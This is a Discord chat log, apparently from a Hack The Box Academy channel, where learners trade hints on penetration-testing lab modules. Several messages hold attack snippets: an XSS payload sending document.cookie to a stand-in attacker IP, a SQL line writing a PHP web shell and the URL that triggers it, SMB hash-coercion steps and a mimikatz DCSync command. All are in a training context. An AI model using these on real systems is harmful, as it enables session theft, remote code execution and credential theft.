#modules

1 messages · Page 206 of 1

raw dew
#

Hi all, I’m relatively new here. Apologies in advance for the long message, but in a nutshell: can a public IP connect to a ‘private IP’ server hosted on pwnbox? I use pwnbox to do the Academy exercises and I just started a simple php server on 0.0.0.0:8080 (assuming that will start the server on the tun connection using the pwnbox 10-dot IP - but maybe I was wrong?). I got a successful connection from the HTB target which is also on the 10-dot network, but 5 minutes later I noticed that I’m getting several connections from another unrecognised IP starting with 45-dot which from my understanding is a public address? My main confusion comes from the fact that it seems that both a public and a private IP seemed to successfully connect to the server I started on pwnbox - can someone help me understand please?

fading matrix
#

Never mind I got it, finally exploring and figuring out like a cyber guy 😅 😆

mint lodge
#

new Image().src='http://OUR_IP/index.php?c='+document.cookie
when it says OUR_IP do they mean the netcat or the php server or what i dont understand

fathom pendant
fathom pendant
fathom pendant
#

target_ip is always used to refer to the target

#

it's almost never left ambiguous

raw dew
#

@fathom pendant thank you so much! This definitely makes sense, probs I should just specify my tun0 IP when starting any servers just so I rest assured I’m on the ‘private’ network as much as possible

mint lodge
#

well it makes no sence to just put the tun0 there

#

im so confused

fathom pendant
#

not an actual manual connection

#

tons of webcrawlers out there scanning every ip under the sun ¯_(ツ)_/¯

raw dew
fathom pendant
#

not to mention: not much risk to you since the pwnbox isn't on your local network

normal panther
#

Any hint guys?

honest rune
#

Hey guys, im working on Login Brute Forcing, Skills assessment - service login.
Im not sure that I work with a right user, can I DM someone to confirm the name?

crystal steeple
#

im trying to capture the mssvc user hash through impacket-smbserver but i get this error, can someone tell me the cause of it?

#

im in Attacking common services module btw

#

attacking sql

fathom pendant
crystal steeple
#

if the version

#

yes its its displaying 2.7.18

fathom pendant
#

then that's why

#

:) impacket stuff is written for python3

crystal steeple
normal panther
#

I was aware of the first one 😄 -eq for "=" but thanks for the word "substring" I learned something new

#

Here's my improv on that

shut wraith
#

SESSION SECURITY

Skills Assessment

- Fuzzed endpoints
- Tried to use XSS payload on all users but no automated actions
- Tried to fixate token using all information about user + date time, tried manual hashing md5 and sha1 as awell as hashcat
- Tried to manipulate requests and changing/removing parameter values
- Tried hydra on login page
- Fuzzed for admin through admin directories, and requests that use the email? parameter
- Tried to make Admin public through change parameter
normal panther
#

This is the way. Thank you for your help.

crystal steeple
fathom pendant
crystal steeple
normal panther
#

have you checked if something is already listening on port 445?

crystal steeple
#

how do you check for that

normal panther
#

netstat -tlpn

crystal steeple
#

i see 445

#

but does this mean its listening on smth? i dont think so isnc there is no PID associated there?

normal panther
#

seems fine to me

crystal steeple
#

i just rm all impacket packages and re installed it

#

i will try if it works

#

didnt work 😮

#

||just to make sure i didn't do something wrong : 1- i used mssqlclient.py to connect with htbdbuser creds given ; 2- i tried to execute EXEC master..xp_subdirs '\10.10.14.81\share' but failed due to low privilege, but EXEC master..xp_dirtree '\10.10.10.81\share' works , 3- set up responder with sudo responder -I tun0, 4- attempting to get hashes with sudo impacket-smbserver share ./ -smb2support||

limber river
crystal steeple
#

but idk why it didnt work

limber river
crystal steeple
cobalt trench
#

Anybody else having issues with targets?

limber surge
#

i got issue rdp into the network currently

limber river
sleek moss
#

┌─[✗]─[sam@parrot]─[~/enum4linux-ng]
└──╼ $pip3 install -r requirements.txt
error: externally-managed-environment

× This environment is externally managed
╰─> To install Python packages system-wide, try apt install
python3-xyz, where xyz is the package you are trying to
install.

If you wish to install a non-Debian-packaged Python package,
create a virtual environment using python3 -m venv path/to/venv.
Then use path/to/venv/bin/python and path/to/venv/bin/pip. Make
sure you have python3-full installed.

If you wish to install a non-Debian packaged Python application,
it may be easiest to use pipx install xyz, which will manage a
virtual environment for you. Make sure you have pipx installed.

See /usr/share/doc/python3.11/README.venv for more information.

note: If you believe this is a mistake, please contact your Python installation or OS distribution provider. You can override this, at the risk of breaking your Python installation or OS, by passing --break-syst

#

why dont it like me do pip3 on yparrotOS htb edition

west light
#

I'm working on the skill assessment for th Windows Attack and Defence module. I have completed the attack but I can't find any logs under the Id 4886 or 4887

sleek moss
#

why

limber surge
#

does anyone target is spawning keep spinning?

cedar void
#

I don't know why its not allowing me to download the mimikatz.exe from the Win32 folder

I tried copying the mimikatz.exe file from the Win32 folder and into the ~ directory . it kept accepting I think the default mimikatz.exe on my local machine thats from the x64 folder. I want the win32 mimikatz.exe the internal pivot machine is working with an AMD 32 bit processor.

I tried removing those x64 mimikatz.exe too...and it did not allow me to remove it(even with sudo permissions)

mimikatz x86 cannot access x64 process

#

nevermind

heavy edge
#

if i complete like the pentester modules with a silver sub, can i go back and look at those modules if i cancel the sub

#

if theyre all completed?

soft cedar
short hare
#

Attacking Enterprise Network Target is not Spawning..!!!

Any HTB staff here???

languid fjord
#

but in general, reaching out to support is the best option if you run into any issues

#

since we dont provide any official support over discord unfortunately

compact patrolBOT
short hare
#

Ok got it

languid fjord
#

Tried spawning one the sections on EU-2 here, worked okay

short hare
languid fjord
#

Not sure what i did there 😅, but glad it worked!

inland mesa
#

Anyone else getting spawn issues? Idk if its me or hackthebox itself

short hare
fathom pendant
wintry iris
#

Found the following information in the password cracking module - hydra
"-u loop around users, not passwords (effective! implied with -x)"

But the manual page says different,
"-u by default Hydra checks all passwords for one login and then tries the next login. This option loops around the passwords, so the first password is tried on all logins, then the next password."

Can anyone explain the difference?

next bronze
#

they mean the same thing, -u tries one password against all users then move on to the next password, instead of the default tries all password against the first user then move to the next user

wintry iris
patent yacht
#

@next bronze

#

could you help me with this By examining the logs located in the "C:\Logs\PowershellExec" directory, determine the process that executed unmanaged PowerShell code. Enter the process name as your answer. Answer format: _.exe

#

i went THREW EVERY EVENT MANUALLY

next bronze
#

was referring to the assembly module, I can't help with cdsa stuff 😅

patent yacht
#

ok 😦

fathom pendant
#

Also he was talking to someone else fwiw

uncut flint
#

Is anyone available to help me with "Intro to Network Traffic Analysis"?

dreamy solar
#

Hello everyone can you help me please

#

I don't find and I don't konw why

raven lagoon
#

its attacking common services module?

dreamy solar
raven lagoon
#

im reading it rn, if you wait few mins i can help you

dreamy solar
#

thanks ^^

fathom pendant
#

Zone transferring should work with the right subdomain

#

Subbrute does not give you records

fathom pendant
dreamy solar
#

yes so I must to use dig AXFR ?

fathom pendant
#

Yes

#

It's one of the first things you should have tried after getting some subdomains

dreamy solar
#

Okkk I look now, thanks

raven lagoon
#

👍

slate palm
#

same issue here - what was the solution to your problem?

next bronze
slate palm
#

of course I have.. I would never ever skip a part of a module and just start in the middle....

#

frantically searches for "machine account"

#

ooof I skipped cross protocol

next bronze
#

I don't remeber running into the problem, I transferred the latest version of coercer to the attack box since the module info is a bit outdated, the HTTP thing has been fixed in the latest release #858470491676737536 message

stiff moon
#

yo on the Kerberos attacks, cant crack the hash. need a hint if someone got time.

stiff moon
#

why wont the hash crack prayge sadglas pepecoffee

acoustic owl
stiff moon
acoustic owl
#

Hash from user ||d…||?

stiff moon
#

ah yeah hash from user

#

to get to question two on skill assessment

acoustic owl
#

||Hashcat || should be fine

patent oak
#

Hey guys! 👋 I hope you're all well. I could do with a hand here on Socks Over RDP part of Pivoting module. I transferred the files and verified that the DLL file is in the folder with explorer. However, it's not there when I try to view in cmd.

next bronze
stiff moon
#

i be back in a min

patent oak
stiff moon
#

i cracked it

soft cedar
stiff moon
#

my theory was right

patent oak
stiff moon
#

so idk why but i get diff hash using kerbrute and the GetNPUsers. idk why but the kerbrute hash is diff so cant crack it but the hash from GetNPUsers does. idk exactly why and how etc. but good to know in the future.

next bronze
#

kerbrute's hashes doesn't work lol

#

has been a probelm for a long time

patent oak
# patent oak Nope 😁

Is this before the transfer? I can see the file there in explorer. Maybe I'll try transfer again

soft cedar
patent oak
#

Nevermind actually it was already off

#

I'm in cmd so maybe I'll try ps as you said

#

Hmm. Still only shows the exe when I list files

#

I'll try again with a python server. I was testing out RDP file share

#

Ah yes. Could not download. Virus detected

#

Gracias amigo

barren root
#

Is the target in skill assesment - File Uploads synced with IRL time?

#

I prefer to ask rather than to spend next few hours banging my head against a wall tryna figure that one out

cobalt osprey
#

is a problem if i connect using the openvpn command from my own pc and not using a virtual machine?

barren root
#

though labs are shared if I m not mistaken

lusty thicket
barren root
#

If I can list the upload dir then ye Ig it wont

lusty thicket
barren root
#

but the way the file is handled is tied to the current date

barren root
#

Oh thank fuck.
Thx

lusty thicket
nocturne flint
#

How is sshuttle compare to ligolo?

desert cypress
#

Hello, I have a problem with the "Exploiting Web Vulnerabilities in Thick-Client Applications module". The windows machine is so slow that I can't work on it to make the module. I have retrieved the .jar on my attack machine and I am trying to make the module. The problem is that I still can't connect with the identifiers provided, even though I've changed the connection port and added the ip to my /etc/hosts. What's more, every time I try to connect I get this error in my window where I have my VPN Academie activated: Authenticate/Decrypt packet error: packet HMAC authentication failed.
If anyone can help me it would be great as I just need this part to finish my module.

barren root
#

do you fullscreen it?

#

For some magical reason windowed RDP connections to windows targets on HTB work at a snails pace

#

if not fullscreened

#

I've discovered it myself few days ago doing exactly that module
Edit: well actually weeks my bad lol

#

+f is the switch in xfreerdp

desert cypress
barren root
barren root
desert cypress
barren root
#

try xfreerdp with +f

desert cypress
barren root
#

bro the client connects to a server only accessible from that windows machine

#

you could in theory port forward

#

but tbh that might open yet another can of worms issues

#

¯_(ツ)_/¯

desert cypress
#

I'm going to try it out, and it'll be a good opportunity to review pivoting/portforwarding. Thanks

barren root
#

good luck. Also make sure to rebulid the jar EXACTLY as the examples show you. I tried doing it "my way" from just one software provided and it did not go well.

desert cypress
barren root
# lusty thicket <:prayge:867733100925550592>

I finally solved the assesment. Magic numbers and formatting going awry because of wack chars being mangled by my system clipboard are going to trigger a PTSD attack every time I see them from now on.
THANKS ! 😂 😂

crystal steeple
#

im in attacking dns section at attacking common services , i try to use the subbrute to enumerate subdomains available but i get error of no nameservers found

soft cedar
crystal steeple
soft cedar
crystal steeple
#

nvm i changed to IP and started to work i think

crystal steeple
#

got the flag !

#

thanks humangod

#

but still idk why the domain name didnt work

acoustic owl
steady dust
#

On Introduction to Python 3 - The First Iterations, i can't reach the target, neither through my kali machine or through Pwnbox. Any ideas? Nmap returned results, but the http port doesn't match with the port given as target.

stiff moon
#

lets go

hot heart
#

Does anyone know why ZAP never works for 💩... I've configured all the settings required to successfully run ZAP and I can never get traffic to run through the dam thing. Ssl certificates installed correctly, foxy proxy settings configured correctly, proxychains.conf file configured correctly, even used ZAP's default settings, restarted all applications, tested zap with curl. Literally have tried everything to no avail, this isn't the first time either

hot heart
stiff moon
#

some minor stuff i missed and so on but nothing special

hot heart
#

Couldn't agree with you more, HTB does a phenomenal job at setting us up for long term growth vs. transient satisfaction

stiff moon
#

yeah

hot heart
#

Are you aiming towards CPTS?

stiff moon
#

tho the labs (in this module atleast) were a bit slow and on the skills assessment it was just excruciating

stiff moon
#

❤️

hot heart
#

huh?

#

oh wtf dude thats sick 😂

stiff moon
#

hehe

#

passed on first attempt in august

hot heart
#

Wow now I'm envious, I NEED THAT

stiff moon
#

haha yeah its kinda cool

hot heart
#

I didn't even know you could add that to your discord profile. Now I'm definitely set on getting mine

stiff moon
#

i didnt myself. HTB does it by automatic when u pass and link ur disc and so on

hot heart
#

Does it do the same for CBBH or any of the other Certs?

stiff moon
#

i think so yeah. not sure but should be so

hot heart
#

Say lessssss, I was under the impression that we got to show boat a screenshot of our congratulations page one time and that was it, but an icon next to your name indefinitely changes the GAME

raven lagoon
stiff moon
open snow
#

for how long was your hydra running (approx.) for password mutations lab? it's currently running for an about an hour, im kinda certain at this point that password will never crack

steady dust
open snow
#

thanks for replying

steady dust
open snow
#

yeah i just switched to the "other one"

#

like 10 minutes ago

#

it's kinda annoying that it takes so much time, but what can you do i guess

tepid flame
#

can I dm someone for the XSS assessment?

sterile epoch
#

hi I am stuck in the last assessment of login bruteforcing
I got the employee name from the last section. I created a wordlist using only that name. and generated an user wordlist with that name. I then trimmed the pass wordlist to passwords that match the minimum criteria using sed. The task was to perform a brute force ssh service ( a really bad joke ig) need help plis

hot heart
steady dust
hot heart
#

😂😂

#

So ZAP not working is universal not just me?

steady dust
hot heart
crystal steeple
fathom pendant
iron heath
#

Hi all, just joined HTB x

stiff moon
acoustic owl
#

Log out and then log in again.

urban wadi
#

anyone know what kind of rewards you will get from streaks?

patent oak
#

Cherrytree is a game changer

#

🍒

urban wadi
#

i use obsidian which is normal but fancy

astral inlet
urban wadi
astral inlet
#

son of a gun

urban wadi
astral inlet
#

medium they say .......

urban wadi
astral inlet
#

medium but the last part was painfully slow

urban wadi
astral inlet
#

solved it with small nudges

urban wadi
astral inlet
#

it takes time tahts all, tehre is no magic

urban wadi
patent oak
acoustic owl
#

Congrats 🎉 but wrong channel 😉

astral inlet
#

i wanted to point out that you can do some Ad in this machine but after around 24 hrs hacking i was tired 🙂

patent oak
urban wadi
#

asking more superior person

potent thorn
#

can anyone help me with the question on Password Attacks - Password Reuse / Default Passwords. I've ssh'd as the user from the previous question, am trying to authenticate to mysql as ive seen 3306 is running on the box, ive tried all default creds from the list in the notes, nothing working. Can anyone give me a hint?

astral inlet
#

as i said it takes time

#

and effort

urban wadi
#

knowledge knowledge knowledge knowledge knowledge

stark vortex
#

if you just do something every day, the knowledge accumulates over time and you become more familiar with it and before you know it you'll be pretty good

urban wadi
astral inlet
#

and if you gain some knowledge after a while you overthink and forget basics

#

thats much worse 😄

urban wadi
stark vortex
#

I guess you just gotta dumb down a lot of problems, but yeah I've definitley had moments where I was in over my head trying to do something more complicated than the actual task was

patent oak
potent thorn
#

yes,

#

nvm

#

ive just done it

patent oak
#

Congrats!

potent thorn
#

oh

#

well i feel stupid. if you put a space after the -p option it wont work

junior oxide
#

had similar issue few days with the module

potent thorn
junior oxide
#

but now im stuck with the credential hunting in windows, whenever i upload a lazagne.exe file and try to execute it in the windows cmd i get a "This app can't run on your PC" i tried differant versions but got similar results

cobalt trench
#

Attacking FTP - The target IP still is not working (not responding to pings or nmap) is this normal for the this module or is something wrong on their end

junior oxide
#

try to restart the machine or check VPN connection or see if you can access FTP using the ftp command

inland wren
#

what's a tcpwrapped nmap keeps showing me this on the hard lab of "network enumeration with nmap"

hazy matrix
#

Hello, I'm having the same issue. Did you figure this out? I'd appreciate any help.

junior oxide
#

does anyone know why the latest version of lazagne.exe doesn't work in the windows credential harvesting module ?

north bramble
#

Guys I am stuck on footprinting module.
Question:
Find out which domain the server belongs to.

Tried:
connecting via rpcclient
Ran enum4linux-ng

north bramble
north bramble
hazy matrix
#

Hello, I'm working on the Web Requests Module. The question is The server above loads the flag after the page is loaded. Use the Network tab in the browser devtools to see what requests are made by the page, and find the request to the flag. And the hint says Look for a request to a file called 'flag_...'. If you can't find it, refresh the page and monitor new requests. I have reloaded a bunch of times, and I don't see anything to a file called flag_... I've tried disabling the cache, and I've reloaded multiple times. I don't see anything. The only thing I can think of is the favicon is coming back with a 404, so is it possible that the webpage is never considered loaded and therefore never triggering the call to the flag? Or is there something else entirely I'm missing?

north bramble
north bramble
desert cypress
urban wadi
junior oxide
#

why lazagne.exe doesn't work in windows credintional harvesting module

junior oxide
#

whenever i run it i get this app doesn't work on your pc error

barren root
#

wrong arch then

#

The fuck was that

junior oxide
#

wasn't me

barren root
#

yeah Ik

junior oxide
#

how do i get the write arch then?

#

*right

barren root
#

honestly I don't remember how I did it. Try downloading a LaZaagne copy from a previous lab

#

and then upload it

torpid cove
#

Hi guys, I need help with the getting started module

barren root
#

How did attempt to launch it?

junior oxide
#

you know what labs contains lazagne ?

#

start lazagne.exe all

#

.\startlazagne.exe all

torpid cove
#

I got a file from the web server using curl and I don't know how to read/analyze the file

barren root
junior oxide
#

without start

#

.\lazagne.exe

barren root
#

yes
.\lazagne.exe all should work
If it doesn't back track one lab back

#

becaause I assume oyu uploaded your own copy correct?

junior oxide
#

i even tried "powershell -Command Set-ExecutionPolicy Unrestricted"

barren root
#

since the lazagne on the machine is not latest

#

@hardy anchor hell you doin?

barren root
hardy anchor
junior oxide
#

i know i was throwing random stuff around

barren root
#

if that doesn't work, b64 encode and send it to me lmfao

#

Maybe I will be able to figure out what is getting filtered

barren root
#

Still, have you uploaded your own lazagne or did you use the one providded?

torpid cove
hardy anchor
barren root
#

if yes then file it

torpid cove
barren root
fathom pendant
#

^

#

Which I'm sure has some exploits ;)

raven lagoon
barren root
junior oxide
#

hol' up

barren root
fathom pendant
#

Its more than an educated guess

junior oxide
#

there is no Tools in C

fathom pendant
#

The module really shoves it in your face

barren root
#

I know. I've exploited that plugin before. WP is a delight to encounter but that's not what I meant

barren root
fathom pendant
torpid cove
barren root
#

Yeah but certain machines do not work well with latest renditions of these tools

#

for some damn reason

fathom pendant
junior oxide
barren root
fathom pendant
#

Aka trying to run 64-bit program on a 32-bit machine

barren root
#

LaZagne only has one release version

#

could you link the module @junior oxide ?

torpid cove
junior oxide
barren root
#

it will do you more good to sit now and study than ask what to do with something this basic. You will need it trust me on that : )

soft cedar
# junior oxide there is no Tools in C

There has to be a copy on the machine, I don’t know what you’re doing or which module but if iirc I think I’ve seen lazagne.exe file on either documents / download dir before.

#

Check there.

torpid cove
# barren root reread the lesson and dive into the rabbit hole

Literally the hint said I should search for plugin exploit and the objective says to get the flag.txt after exploiting the target so idk how to exploit the target since I can't find a directory that displays the login page and idk how to get any file that has a list of user to perform bruteforcing

barren root
#

Damn I m out of luck. I solved the module but I don't remember how...
hm...
let me try something

junior oxide
#

ill try to check others users

barren root
true dagger
torpid cove
torpid cove
barren root
#

Dude did you put the name of the plugin in the google search bar?

#

Public Exploits are PUBLIC
Use them nets : 3

junior oxide
barren root
fathom pendant
torpid cove
barren root
#

I had a similar issue before so I m hoping I can help you. I had to figure it on my own but it was a pain in the ass and I would love to help you

junior oxide
#

how did you upload the file itself ? i used an open smb share to transfare the file

torpid cove
true dagger
#

I'm confused I did this module 2 days ago as well but I think I must of done it a different way lol

soft cedar
torpid cove
fathom pendant
true dagger
#

You say trouble finding login path we talking http?

fathom pendant
torpid cove
fathom pendant
#

If you got a file, perhaps see what that file is

#

And figure out how to manipulate the options to get what you want

junior oxide
#

is it normal to type "type lazagne.exe" and get nothing ? i guess i missed something up while uploading

barren root
# junior oxide still empty

I have no idea how to help you then and I need to be going now.

But I m 100% sure there is a working copy in the module somewhere

junior oxide
fathom pendant
torpid cove
fathom pendant
#

If you check the options of the module you used

#

It's a fairly obvious file, it's not necessarily written in a programming language

junior oxide
fathom pendant
true dagger
junior oxide
#

it worked

#

i used curl to download it and the binary for some reason was empty

#

i downloaded it manually and transfared it using the same smb share i created

hardy anchor
#

Hey! Someone can help me with Documentation & report lab? I'm really stuck, I have a lot of creds but I'm not able to answer question 1

torpid cove
#

Alright

raven lagoon
#

Do i have to restart the machine (Attacking Common Services hard lab)

mint lodge
#

uhh i found a flag from doing sqlmap i try to submit and its not the right answer but it is because i got it from the db so im confused...

fathom pendant
raven lagoon
#

into j user

fathom pendant
#

I just remember it being a bit of a chain ¯_(ツ)_/¯

raven lagoon
#

💀

#

i lost 2 hours for that machine

#

the medium one 2 minutes

fathom pendant
#

because you're not really prepped for what it wants to do, but it is explained in the mssql section ¯_(ツ)_/¯

raven lagoon
#

;\

fathom pendant
#

That's what made it click for me

raven lagoon
#

y btw i had to research on mssql section ty

fathom pendant
raven lagoon
#

chillout man

viscid gulch
#

guys I'm really stuck at the password and attacks module section Passwd, Shadow & Opasswd. I found the passwd and shadow files that were hidden, I unshadowed them, and tried to crack using what we find in resources
and it doesn't return anything
been stuck for a while today

fathom pendant
#

Try with rockyou, or the mutated list

mint lodge
#

how did the -v option made me find the sqli and without it it didnt find the injection when the -v option is for different verbosity levels???

#

can someone explain?

raven lagoon
#

Are you sure you havent change the level or the risk?

mint lodge
#

i am sure

#

thats why im so confused

raven lagoon
#

lol

mint lodge
#

🤷‍♂️

raven lagoon
#

Happens

hardy anchor
#

Hey! Someone can help me with Documentation & report practice lab? I'm really stuck, I have a lot of creds but I'm not able to answer q1

#

Please

native turtle
#

Does anyone notice slow connectivity on the EU 1 server?

#

my ffuf fuzz runs 3 req/s

#

I already tried to regenerate a new vpn file

shut quest
native turtle
#

eu 2 go little bit better

fathom pendant
#

what is this?

#

random ass link

rustic sage
#

Dumb link

fathom pendant
#

<@&861185840277487616> unrelated link and it's not even an infostealer attempt

languid dawn
#

Please stay on topic and don't post random links

fathom pendant
languid dawn
#

¯_(ツ)_/¯ that's all they posted so I'll chuck it up to a failed copy paste

fathom pendant
#

probably kek

ember coral
#

Anyone able to help a bit with my pivot? for some reason i cant connect to my attack box to download a file. im working on the AD enum & attacks skill assessment. Set up my ligolo and am on ms02 just cant figure out why my file transfer is failing, its like it can communicate but fairly sure i have my listener set up correctly

soft cedar
fathom pendant
#

^

austere sapphire
#

So ive started on the getting started module and im going through these and i am confused on how some of these got these passwords and usernames and also im wondering what could be a good way to learn this instead of copy pasting

#

because ive noticed im copy pasting but not learning or maintaining

tranquil axle
austere sapphire
#

So anyone in particular

tranquil axle
austere sapphire
#

I was also working on the linux starting one

#

its called getting started

#

I can dm a picture if that helps

austere sapphire
#

and ive done the intro to the acaddemy and a little of intro to linux

tranquil axle
#

ah okay, so you are on the academy part of hackthebox. Theres also the "app" part that has a bunch of machines without much guidance

#

and what part exactly is confusing you?

austere sapphire
#

but im working on "getting started"

austere sapphire
#

im just following the same exact steps they where using

#

Which is good but i dont feel like im retaining it

#

Also they have like this one where they got a password and username out of thin air

tranquil axle
#

can you tell me in which section that is?

#

maybe I can put it in perspective

austere sapphire
#

Public exploits

#

Im stuck on that one atm

tranquil axle
#

hm I dont see a password or username in that section?

austere sapphire
#

The one before sorry

ember coral
fathom pendant
austere sapphire
#

It had somehting to do with bob

fathom pendant
#

the password is given in the text as "bob:password"

cobalt trench
#

I've noticed that this course requires you to do some independent research ontop of what you learn in the course materiel so simply copy and pasting alone wont work majority of the time

fathom pendant
fathom pendant
ember coral
fathom pendant
austere sapphire
ember coral
austere sapphire
#

unless t stated

fathom pendant
tranquil axle
# austere sapphire It had somehting to do with bob

the whole module is just a quick rundown of how people usually approach boxes on HTB when they want to hack them. It tries to showcase a lot of things without going too much in depth, the example with "bob" was just to show you what it looks like when you have credentials and what it looks like whe you don't. You were not supposed to find this out by yourself, but later on you learn techniques that help you figure out what valid users are for example

fathom pendant
#

99% of the time: (unless otherwise inferred or stated) the info is given to you

austere sapphire
#

Oh so im thinking too hard abou tit

#

for now

fathom pendant
#

yes

cobalt trench
austere sapphire
#

alright but i still feel like im not retaining it

fathom pendant
#

the getting-started module is very much just showcasing common methods

fathom pendant
#

you're not expected to remember every little nuanced thing ¯_(ツ)_/¯

austere sapphire
#

ive taken notes but its mainly been the same as the cheatsheet they give you

cobalt trench
#

Once you do a couple labs/exercises it will start to click

fathom pendant
#

the later modules provide much more context to what's being done

tranquil axle
austere sapphire
fathom pendant
#

your notes should be written in your own words to help you understand it better

#

avoid technical jargon unless you absolutely need it

tranquil axle
#

and the skill assessments in the modules are usually pretty good in making sure you understood whats happening. As long as you try to solve them yourself without trying to get too much help

grave bear
#

is anyone else struggling with the ips and boxes they provide in the modules? they keep disconnecting

austere sapphire
#

Like i dont know that abreviation

cobalt trench
fathom pendant
fathom pendant
grave bear
fathom pendant
#

CPTS - Certified Penetration Testing Specialist

grave bear
austere sapphire
fathom pendant
#

HTB has 4 certs; 3 entry 1 intermediate; in order CBBH CPTS CDSA CWEE

grave bear
cobalt trench
austere sapphire
#

Thats the plan which was trying to get access into websites

fathom pendant
austere sapphire
grave bear
fathom pendant
cobalt trench
#

Switching vpn regions now though. If it doesnt work Im calling it a day

austere sapphire
#

alright but will this one be a good one to start off my knowledge for

fathom pendant
grave bear
fathom pendant
cobalt trench
fathom pendant
#

it will build up a good base for you to jump off of

cobalt trench
tranquil axle
austere sapphire
fathom pendant
fathom pendant
#

CBBH does

cobalt trench
fathom pendant
#

CBBH; Bug hunting and code review- no post-exploitation

fathom pendant
austere sapphire
#

i called it coding but the aspect wise shell stuff

fathom pendant
#

those come immediately to mind

cobalt trench
#

gotcha

fathom pendant
tranquil axle
cobalt trench
grave bear
#

how far are all of you into the cpts path

cobalt trench
#

34.79% - Since ips arent working 🙂

tranquil axle
austere sapphire
grave bear
#

oi im only like 12%

vale pagoda
#

I am the attacking lsass part of the password attacks module and I have some issue with pypykatz does anyone another tool that I can use?

crystal steeple
#

im on attacking common services easy lab, i found the creds that logged me to mysql but i have no clue what to do after, couldn't find any useful creds there

#

and i don't know the location of the flag.txt to execute load_FILE("Path to file")

#

any hint will be appreciated :3

fathom pendant
crystal steeple
#

well i thought of rce but i just didnt figure out how yet

fathom pendant
#

I assume you already checked ||ftp||?

crystal steeple
#

yes

#

i got that webserver directory

#

idk why my rce doesn't work

fathom pendant
#

mhm and some other stuff

crystal steeple
fathom pendant
#

just make sure your code is formatted correctly

#

and what you're using as your variable

austere sapphire
#

oh foundations

#

sorry found it

crystal steeple
#

im using

#

||SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE 'C:\CoreFTP\webshell.php';||

#

but idk how to provoke the rce, i browse to that file but nothing

fathom pendant
#

look into what the webroot of the web server is

fathom pendant
crystal steeple
#

wait

fathom pendant
#

||$_GET['c']|| is requesting the variable, since it's not specified in the file: you can provide it via browser arguments

#

test with whoami first

#

then try more complex commands such as "where"

crystal steeple
#

i see

#

let me try that

#

:/ im lost lol

#

i dont think i put the right filepath

crystal steeple
fathom pendant
#

:)

#

||xampp|| look it up 😉

crystal steeple
#

i wil restart the lab just in case

vocal tangle
#

good evening. Where do i have to post a question about how to solve a retired machine? I'm stuck

fathom pendant
fathom pendant
vocal tangle
#

thank u

crystal steeple
#

i used

#

||SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE 'C:\xampp\htdocs\webshell.php';||

#

and then

#

||https://[IP]/webshell.php?c=whoami||

#

but i only get blank page

ember coral
#

is AD module not available on all machines?

crystal steeple
crystal steeple
#

and when i navigated its worked

fathom pendant
#

Ah

#

This is why I like using ` for codeblocks

#

Discord only displays 1 \ if you do \\ \

crystal steeple
fathom pendant
#

If that was in your og copy/paste, discord formatting hid some of your issues

fathom pendant
#

In which case it would have been super easy to resolve

#

Also, did you figure out both intended ways?

crystal steeple
#

first one was rce

#

second one maybe with a reverse shell?

fathom pendant
crystal steeple
#

with load_files?

fathom pendant
#

Yep

crystal steeple
#

but wouldn't you need the rce to find the flag.txt location first?

#

so basically reading the file in sql is just a matter of preferences since you already achieved rce you could just read it directly in the browser no?

cedar void
fathom pendant
#

Or just underthinking it lol

mellow delta
#

Hello, I am trying to work through the pentesting learning module. I am currently on the public exploits section where there is a webserver to try and find the flag. I have run nmap and visited the ip, I know it's a wordpress site with a simple backup 2.7.10 vulnerability. I have run metasploit and found the plugin exploit. I ran it, it gave me a back a txt file with various info but it I don't know where or how to go from here

fathom pendant
#

Investigating that txt file it may look familiar if you know Linux systems

mellow delta
#

I know a little, but apparently not enough, it has a root user but the password is x'ed out

fathom pendant
#

That's not the focus of this

mellow delta
#

that's my point, I am not sure what I am missing here

fathom pendant
#

Check the options of the exploit

mellow delta
#

can you be a bit more specific about what I am checking? I configured the exploit for the right RHOST

fathom pendant
mellow delta
#

yes, it's configure for /etc/passwd

fathom pendant
#

So, change it

#

I believe the question tells you where the flag.txt is

mellow delta
#

hmm, let me go back and check the question

#

are you saying that the /flag.txt file is a subfolder of the /etc/passwd?

#

because otherwise I think the question only says to get to the contents of /flag.txt file

torpid cove
#

I need help with the "Getting Started" module guys

#

I need help with privilege escalation

#

I already hacked the ssh server...

fathom pendant
#

Not a subfolder

mellow delta
#

ah

#

thank you, let me try that

fathom pendant
#

Just literally /flag.txt

fathom pendant
cedar void
# cedar void ||I found the ntlm hash for t***** through an lsa dump but when I use the hashca...

I already ran the lsa dump in mimikatz and it didn't return the credentials for ||tpetty||

lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\tpetty

||
||atz # lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\tpetty
[DC] 'INLANEFREIGHT.LOCAL' will be the domain
[DC] 'DC01.INLANEFREIGHT.LOCAL' will be the DC server
[DC] 'INLANEFREIGHT\tpetty' will be the user account
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)||||

That error code I think is related to elevated privileges( I am logged in with the user svc_sql) ..and when I ran as 'Administrator) on that machine it did not fix the issue.

And again, I ran the ntlm hash value with hashcat for the users password hash a... and it returned no results.

mellow delta
torpid cove
# fathom pendant That doesn't tell much

My approach of Penetration is to get a privEsc tool to enumerate the SSH server and I'll read the results for vulnerabilities but idk how to get the tool onto the ssh server

fathom pendant
#

I mean you don't necessarily need the tool. But the section should have gone over some basics, or some was gone over earlier

#

Sometimes a simple sudo -l is helpful enough

torpid cove
fathom pendant
torpid cove
fathom pendant
#

yes

#

i'm helping guide you how to figure it out

#

giving you the direct command doesn't necessarily help you, except to expect more handouts of the answer

#

gotta learn how to unstuck yourself

torpid cove
fathom pendant
#

I'm not telling you: LOL go figure it out
I'm telling you: Here's a resource to help you figure it out instead of endless google searches

ember coral
#

Something i dont understand. Working on Skill assessment 2 for AD enum & attack. || I ran resonder and it is skipping previouslly discovered hash... okay what ever. But when i go cat out the hash file there are multiple hashes for the same user. Is this by design?||

fathom pendant
#

so it skips it from the same service

#

also delete the image as it's still a spoiler

#

:) (spoiler tags don't really do anything)

limber river
#

quick question , going blind in the entreprise network means done it without reading the question right ?

fathom pendant
#

the lab is used throughout the whole module

#

and the sections are practically walk-throughs for each bit

limber river
fathom pendant
#

yup until you get DA or SA if it's a whole Forest

limber river
#

nice , tysm

fathom pendant
#

also fwiw i think there's only like 1 thing that wasn't covered but the rest is all you've learned. At least that's what people have said

crystal steeple
#

i've been respawning the machine 1000 times on medium lab and can't find the nonstandard port

#

only 5 ports are opensadglas

fathom pendant
